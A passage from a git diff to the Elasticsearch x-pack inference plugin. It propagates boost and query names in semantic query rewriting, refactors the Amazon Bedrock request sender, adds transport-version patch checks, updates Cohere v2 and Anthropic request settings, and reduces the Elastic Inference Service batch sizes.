b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java index fd1d65d00faf5..a6599afc66c3f 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java @@ -36,7 +36,10 @@ protected String getQuery(QueryBuilder queryBuilder) { @Override protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceIndexInformationForField indexInformation) { - return new SemanticQueryBuilder(indexInformation.fieldName(), getQuery(queryBuilder), false); + SemanticQueryBuilder semanticQueryBuilder = new SemanticQueryBuilder(indexInformation.fieldName(), getQuery(queryBuilder), false); + semanticQueryBuilder.boost(queryBuilder.boost()); + semanticQueryBuilder.queryName(queryBuilder.queryName()); + return semanticQueryBuilder; } @Override @@ -45,7 +48,10 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( InferenceIndexInformationForField indexInformation ) { assert (queryBuilder instanceof MatchQueryBuilder); - MatchQueryBuilder matchQueryBuilder = (MatchQueryBuilder) queryBuilder; + MatchQueryBuilder originalMatchQueryBuilder = (MatchQueryBuilder) queryBuilder; + // Create a copy for non-inference fields without boost and _name + MatchQueryBuilder matchQueryBuilder = copyMatchQueryBuilder(originalMatchQueryBuilder); + BoolQueryBuilder boolQueryBuilder = new BoolQueryBuilder(); boolQueryBuilder.should( createSemanticSubQuery( @@ -55,6 +61,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); boolQueryBuilder.should(createSubQueryForIndices(indexInformation.nonInferenceIndices(), matchQueryBuilder)); + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } @@ -62,4 +70,24 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( public String getQueryName() { return MatchQueryBuilder.NAME; } + + private MatchQueryBuilder copyMatchQueryBuilder(MatchQueryBuilder queryBuilder) { + MatchQueryBuilder matchQueryBuilder = new MatchQueryBuilder(queryBuilder.fieldName(), queryBuilder.value()); + matchQueryBuilder.operator(queryBuilder.operator()); + matchQueryBuilder.prefixLength(queryBuilder.prefixLength()); + matchQueryBuilder.maxExpansions(queryBuilder.maxExpansions()); + matchQueryBuilder.fuzzyTranspositions(queryBuilder.fuzzyTranspositions()); + matchQueryBuilder.lenient(queryBuilder.lenient()); + matchQueryBuilder.zeroTermsQuery(queryBuilder.zeroTermsQuery()); + matchQueryBuilder.analyzer(queryBuilder.analyzer()); + matchQueryBuilder.minimumShouldMatch(queryBuilder.minimumShouldMatch()); + matchQueryBuilder.fuzzyRewrite(queryBuilder.fuzzyRewrite()); + + if (queryBuilder.fuzziness() != null) { + matchQueryBuilder.fuzziness(queryBuilder.fuzziness()); + } + + matchQueryBuilder.autoGenerateSynonymsPhraseQuery(queryBuilder.autoGenerateSynonymsPhraseQuery()); + return matchQueryBuilder; + } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java index a35e83450c55a..c85a21f10301d 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java @@ -43,14 +43,18 @@ protected String getQuery(QueryBuilder queryBuilder) { @Override protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceIndexInformationForField indexInformation) { Map> inferenceIdsIndices = indexInformation.getInferenceIdsIndices(); + QueryBuilder finalQueryBuilder; if (inferenceIdsIndices.size() == 1) { // Simple case, everything uses the same inference ID String searchInferenceId = inferenceIdsIndices.keySet().iterator().next(); - return buildNestedQueryFromSparseVectorQuery(queryBuilder, searchInferenceId); + finalQueryBuilder = buildNestedQueryFromSparseVectorQuery(queryBuilder, searchInferenceId); } else { // Multiple inference IDs, construct a boolean query - return buildInferenceQueryWithMultipleInferenceIds(queryBuilder, inferenceIdsIndices); + finalQueryBuilder = buildInferenceQueryWithMultipleInferenceIds(queryBuilder, inferenceIdsIndices); } + finalQueryBuilder.queryName(queryBuilder.queryName()); + finalQueryBuilder.boost(queryBuilder.boost()); + return finalQueryBuilder; } private QueryBuilder buildInferenceQueryWithMultipleInferenceIds( @@ -82,7 +86,14 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( boolQueryBuilder.should( createSubQueryForIndices( indexInformation.nonInferenceIndices(), - createSubQueryForIndices(indexInformation.nonInferenceIndices(), sparseVectorQueryBuilder) + new SparseVectorQueryBuilder( + sparseVectorQueryBuilder.getFieldName(), + sparseVectorQueryBuilder.getQueryVectors(), + sparseVectorQueryBuilder.getInferenceId(), + sparseVectorQueryBuilder.getQuery(), + sparseVectorQueryBuilder.shouldPruneTokens(), + sparseVectorQueryBuilder.getTokenPruningConfig() + ) ) ); // We always perform nested subqueries on semantic_text fields, to support @@ -95,6 +106,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); } + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java index 60f274b161d1b..ccc52087288d0 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.service.ClusterService; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; import org.elasticsearch.inference.InferenceServiceResults; import org.elasticsearch.threadpool.ThreadPool; @@ -38,31 +37,46 @@ public class AmazonBedrockRequestSender implements Sender { public static class Factory { private final ServiceComponents serviceComponents; - private final ClusterService clusterService; + private final AmazonBedrockRequestExecutorService executorService; + private final CountDownLatch startCompleted = new CountDownLatch(1); + private final AmazonBedrockRequestSender bedrockRequestSender; public Factory(ServiceComponents serviceComponents, ClusterService clusterService) { - this.serviceComponents = Objects.requireNonNull(serviceComponents); - this.clusterService = Objects.requireNonNull(clusterService); - } - - public Sender createSender() { - var clientCache = new AmazonBedrockInferenceClientCache( - (model, timeout) -> AmazonBedrockInferenceClient.create(model, timeout, serviceComponents.threadPool()), - Clock.systemUTC() + this( + serviceComponents, + clusterService, + new AmazonBedrockExecuteOnlyRequestSender( + new AmazonBedrockInferenceClientCache( + (model, timeout) -> AmazonBedrockInferenceClient.create(model, timeout, serviceComponents.threadPool()), + Clock.systemUTC() + ), + serviceComponents.throttlerManager() + ) ); - return createSender(new AmazonBedrockExecuteOnlyRequestSender(clientCache, serviceComponents.throttlerManager())); } - Sender createSender(AmazonBedrockExecuteOnlyRequestSender requestSender) { - var sender = new AmazonBedrockRequestSender( + public Factory( + ServiceComponents serviceComponents, + ClusterService clusterService, + AmazonBedrockExecuteOnlyRequestSender requestSender + ) { + this.serviceComponents = Objects.requireNonNull(serviceComponents); + Objects.requireNonNull(clusterService); + + executorService = new AmazonBedrockRequestExecutorService( serviceComponents.threadPool(), - clusterService, - serviceComponents.settings(), - Objects.requireNonNull(requestSender) + startCompleted, + new RequestExecutorServiceSettings(serviceComponents.settings(), clusterService), + requestSender ); + + bedrockRequestSender = new AmazonBedrockRequestSender(serviceComponents.threadPool(), executorService, startCompleted); + } + + public Sender createSender() { // ensure this is started - sender.start(); - return sender; + bedrockRequestSender.start(); + return bedrockRequestSender; } } @@ -71,21 +85,16 @@ Sender createSender(AmazonBedrockExecuteOnlyRequestSender requestSender) { private final ThreadPool threadPool; private final AmazonBedrockRequestExecutorService executorService; private final AtomicBoolean started = new AtomicBoolean(false); - private final CountDownLatch startCompleted = new CountDownLatch(1); + private final CountDownLatch startCompleted; protected AmazonBedrockRequestSender( ThreadPool threadPool, - ClusterService clusterService, - Settings settings, - AmazonBedrockExecuteOnlyRequestSender requestSender + AmazonBedrockRequestExecutorService executorService, + CountDownLatch startCompleted ) { this.threadPool = Objects.requireNonNull(threadPool); - executorService = new AmazonBedrockRequestExecutorService( - threadPool, - startCompleted, - new RequestExecutorServiceSettings(settings, clusterService), - requestSender - ); + this.executorService = Objects.requireNonNull(executorService); + this.startCompleted = Objects.requireNonNull(startCompleted); } @Override diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java index bb0a8a3348ada..ad06e669ff567 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java @@ -79,9 +79,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS) + || version.isPatchFrom(TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalEnum(cohereTruncation()); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java index bec8908ab73f9..791518ccc9168 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java @@ -263,6 +263,19 @@ public static InferenceServiceConfiguration get() { .build() ); + configurationMap.put( + AnthropicServiceFields.MAX_TOKENS, + new SettingsConfiguration.Builder(EnumSet.of(TaskType.COMPLETION)).setDescription( + "The maximum number of tokens to generate before stopping." + ) + .setLabel("Max Tokens") + .setRequired(true) + .setSensitive(false) + .setUpdatable(false) + .setType(SettingsConfigurationFieldType.INTEGER) + .build() + ); + configurationMap.putAll(DefaultSecretSettings.toSettingsConfiguration(supportedTaskTypes)); configurationMap.putAll( RateLimitSettings.toSettingsConfigurationWithDescription( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java index f512444c6d6a4..2d52a8a9dadbb 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java @@ -28,13 +28,16 @@ public class CohereUtils { public static final String DOCUMENTS_FIELD = "documents"; public static final String EMBEDDING_TYPES_FIELD = "embedding_types"; public static final String INPUT_TYPE_FIELD = "input_type"; - public static final String MESSAGE_FIELD = "message"; + public static final String V1_MESSAGE_FIELD = "message"; + public static final String V2_MESSAGES_FIELD = "messages"; public static final String MODEL_FIELD = "model"; public static final String QUERY_FIELD = "query"; + public static final String V2_ROLE_FIELD = "role"; public static final String SEARCH_DOCUMENT = "search_document"; public static final String SEARCH_QUERY = "search_query"; - public static final String TEXTS_FIELD = "texts"; public static final String STREAM_FIELD = "stream"; + public static final String TEXTS_FIELD = "texts"; + public static final String USER_FIELD = "user"; public static Header createRequestSourceHeader() { return new BasicHeader(REQUEST_SOURCE_HEADER, ELASTIC_REQUEST_SOURCE); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java index 4fa4552dcd94d..0be1ba8d25f29 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java @@ -30,7 +30,7 @@ public CohereV1CompletionRequest(List input, CohereCompletionModel model public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); // we only allow one input for completion, so always get the first one - builder.field(CohereUtils.MESSAGE_FIELD, input.getFirst()); + builder.field(CohereUtils.V1_MESSAGE_FIELD, input.getFirst()); if (getModelId() != null) { builder.field(CohereUtils.MODEL_FIELD, getModelId()); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java index 028c4a0d486c0..1a8eae321ac77 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java @@ -29,8 +29,13 @@ public CohereV2CompletionRequest(List input, CohereCompletionModel model @Override public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); + builder.startArray(CohereUtils.V2_MESSAGES_FIELD); + builder.startObject(); + builder.field(CohereUtils.V2_ROLE_FIELD, CohereUtils.USER_FIELD); // we only allow one input for completion, so always get the first one - builder.field(CohereUtils.MESSAGE_FIELD, input.getFirst()); + builder.field("content", input.getFirst()); + builder.endObject(); + builder.endArray(); builder.field(CohereUtils.MODEL_FIELD, getModelId()); builder.field(CohereUtils.STREAM_FIELD, isStreaming()); builder.endObject(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java index ac6b7ab10c8b3..4c2ff22a5829a 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java @@ -90,9 +90,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeMap(secretParameters, StreamOutput::writeSecureString); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java index deb6e17ec5311..4a4166cf65ed3 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java @@ -355,6 +355,12 @@ public TransportVersion getMinimalSupportedVersion() { return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean hideFromConfigurationApi() { + // The Custom service is very configurable so we're going to hide it from being exposed in the service API. + return true; + } + public static class Configuration { public static InferenceServiceConfiguration get() { return configuration.getOrCompute(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java index 83048120bc545..931eb3b798553 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java @@ -394,9 +394,16 @@ public ToXContentObject getFilteredXContentObject() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { textEmbeddingSettings.writeTo(out); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java index bb665cc196bdf..2d43e42781009 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java @@ -100,9 +100,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeGenericMap(parameters); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java index 5e9a7e5f93a0b..06f21e19a6408 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java @@ -176,9 +176,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_DEEPSEEK; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_DEEPSEEK) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_DEEPSEEK_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java index 640929b058760..4f8d0d01861cd 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java @@ -89,7 +89,10 @@ public class ElasticInferenceService extends SenderService { public static final String NAME = "elastic"; public static final String ELASTIC_INFERENCE_SERVICE_IDENTIFIER = "Elastic Inference Service"; public static final Integer DENSE_TEXT_EMBEDDINGS_DIMENSIONS = 1024; - public static final Integer SPARSE_TEXT_EMBEDDING_MAX_BATCH_SIZE = 512; + // The maximum batch size for sparse text embeddings is set to 16. + // This value was reduced from 512 due to memory constraints; batch sizes above 32 can cause GPU out-of-memory errors. + // A batch size of 16 provides optimal throughput and stability, especially on lower-tier instance types. + public static final Integer SPARSE_TEXT_EMBEDDING_MAX_BATCH_SIZE = 16; private static final EnumSet IMPLEMENTED_TASK_TYPES = EnumSet.of( TaskType.SPARSE_EMBEDDING, @@ -99,16 +102,18 @@ public class ElasticInferenceService extends SenderService { ); private static final String SERVICE_NAME = "Elastic"; - // TODO: check with team, what makes the most sense - private static final Integer DENSE_TEXT_EMBEDDINGS_MAX_BATCH_SIZE = 32; + // TODO: revisit this value once EIS supports dense models + // The maximum batch size for dense text embeddings is proactively set to 16. + // This mirrors the memory constraints observed with sparse embeddings + private static final Integer DENSE_TEXT_EMBEDDINGS_MAX_BATCH_SIZE = 16; // rainbow-sprinkles static final String DEFAULT_CHAT_COMPLETION_MODEL_ID_V1 = "rainbow-sprinkles"; static final String DEFAULT_CHAT_COMPLETION_ENDPOINT_ID_V1 = defaultEndpointId(DEFAULT_CHAT_COMPLETION_MODEL_ID_V1); - // elser-v2 - static final String DEFAULT_ELSER_MODEL_ID_V2 = "elser-v2"; - static final String DEFAULT_ELSER_ENDPOINT_ID_V2 = defaultEndpointId(DEFAULT_ELSER_MODEL_ID_V2); + // elser-2 + static final String DEFAULT_ELSER_2_MODEL_ID = "elser_model_2"; + static final String DEFAULT_ELSER_ENDPOINT_ID_V2 = defaultEndpointId("elser-2"); // multilingual-text-embed static final String DEFAULT_MULTILINGUAL_EMBED_MODEL_ID = "multilingual-embed-v1"; @@ -174,13 +179,13 @@ private static Map initDefaultEndpoints( ), MinimalServiceSettings.chatCompletion(NAME) ), - DEFAULT_ELSER_MODEL_ID_V2, + DEFAULT_ELSER_2_MODEL_ID, new DefaultModelConfig( new ElasticInferenceServiceSparseEmbeddingsModel( DEFAULT_ELSER_ENDPOINT_ID_V2, TaskType.SPARSE_EMBEDDING, NAME, - new ElasticInferenceServiceSparseEmbeddingsServiceSettings(DEFAULT_ELSER_MODEL_ID_V2, null, null), + new ElasticInferenceServiceSparseEmbeddingsServiceSettings(DEFAULT_ELSER_2_MODEL_ID, null, null), EmptyTaskSettings.INSTANCE, EmptySecretSettings.INSTANCE, elasticInferenceServiceComponents, @@ -213,7 +218,6 @@ private static Map initDefaultEndpoints( DenseVectorFieldMapper.ElementType.FLOAT ) ), - DEFAULT_RERANK_MODEL_ID_V1, new DefaultModelConfig( new ElasticInferenceServiceRerankModel( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java index c0addad455222..28e05b24bad64 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java @@ -243,14 +243,15 @@ private void sendAuthorizationRequest() { } private synchronized void setAuthorizedContent(ElasticInferenceServiceAuthorizationModel auth) { - logger.debug("Received authorization response"); - var authorizedTaskTypesAndModels = authorizedContent.get().taskTypesAndModels.merge(auth) - .newLimitedToTaskTypes(EnumSet.copyOf(implementedTaskTypes)); + logger.debug(() -> Strings.format("Received authorization response, %s", auth)); + + var authorizedTaskTypesAndModels = auth.newLimitedToTaskTypes(EnumSet.copyOf(implementedTaskTypes)); + logger.debug(() -> Strings.format("Authorization entity limited to service task types, %s", authorizedTaskTypesAndModels)); // recalculate which default config ids and models are authorized now - var authorizedDefaultModelIds = getAuthorizedDefaultModelIds(auth); + var authorizedDefaultModelIds = getAuthorizedDefaultModelIds(authorizedTaskTypesAndModels); - var authorizedDefaultConfigIds = getAuthorizedDefaultConfigIds(authorizedDefaultModelIds, auth); + var authorizedDefaultConfigIds = getAuthorizedDefaultConfigIds(authorizedDefaultModelIds, authorizedTaskTypesAndModels); var authorizedDefaultModelObjects = getAuthorizedDefaultModelsObjects(authorizedDefaultModelIds); authorizedContent.set( new AuthorizedContent(authorizedTaskTypesAndModels, authorizedDefaultConfigIds, authorizedDefaultModelObjects) @@ -337,7 +338,12 @@ private void handleRevokedDefaultConfigs(Set authorizedDefaultModelIds) firstAuthorizationCompletedLatch.countDown(); }); - logger.debug("Synchronizing default inference endpoints"); + logger.debug( + () -> Strings.format( + "Synchronizing default inference endpoints, attempting to remove ids: %s", + unauthorizedDefaultInferenceEndpointIds + ) + ); modelRegistry.removeDefaultConfigs(unauthorizedDefaultInferenceEndpointIds, deleteInferenceEndpointsListener); } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java index 07c64ab020814..e8dc9c12c94f1 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java @@ -161,4 +161,16 @@ public boolean equals(Object o) { public int hashCode() { return Objects.hash(taskTypeToModels, authorizedTaskTypes, authorizedModelIds); } + + @Override + public String toString() { + return "{" + + "taskTypeToModels=" + + taskTypeToModels + + ", authorizedTaskTypes=" + + authorizedTaskTypes + + ", authorizedModelIds=" + + authorizedModelIds + + '}'; + } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java index 46c56b80e3bec..c1e888d3ecf1c 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java @@ -9,7 +9,8 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import org.elasticsearch.ElasticsearchWrapperException; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.Strings; import org.elasticsearch.core.Nullable; @@ -86,25 +87,25 @@ public void getAuthorization(ActionListener newListener = ActionListener.wrap(results -> { if (results instanceof ElasticInferenceServiceAuthorizationResponseEntity authResponseEntity) { + logger.debug(() -> Strings.format("Received authorization information from gateway %s", authResponseEntity)); listener.onResponse(ElasticInferenceServiceAuthorizationModel.of(authResponseEntity)); } else { - logger.warn( - Strings.format( - FAILED_TO_RETRIEVE_MESSAGE + " Received an invalid response type: %s", - results.getClass().getSimpleName() - ) + var errorMessage = Strings.format( + "%s Received an invalid response type from the Elastic Inference Service: %s", + FAILED_TO_RETRIEVE_MESSAGE, + results.getClass().getSimpleName() ); - listener.onResponse(ElasticInferenceServiceAuthorizationModel.newDisabledService()); + + logger.warn(errorMessage); + listener.onFailure(new ElasticsearchException(errorMessage)); } requestCompleteLatch.countDown(); }, e -> { - Throwable exception = e; - if (e instanceof ElasticsearchWrapperException wrapperException) { - exception = wrapperException.getCause(); - } + // unwrap because it's likely a retry exception + var exception = ExceptionsHelper.unwrapCause(e); - logger.warn(Strings.format(FAILED_TO_RETRIEVE_MESSAGE + " Encountered an exception: %s", exception)); - listener.onResponse(ElasticInferenceServiceAuthorizationModel.newDisabledService()); + logger.warn(Strings.format(FAILED_TO_RETRIEVE_MESSAGE + " Encountered an exception: %s", exception), exception); + listener.onFailure(e); requestCompleteLatch.countDown(); }); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java index 5047f34a1b2e3..e8eeee5a34dd4 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java @@ -205,9 +205,16 @@ public XContentBuilder toXContent(XContentBuilder builder, Params params) throws @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(modelId); diff --git 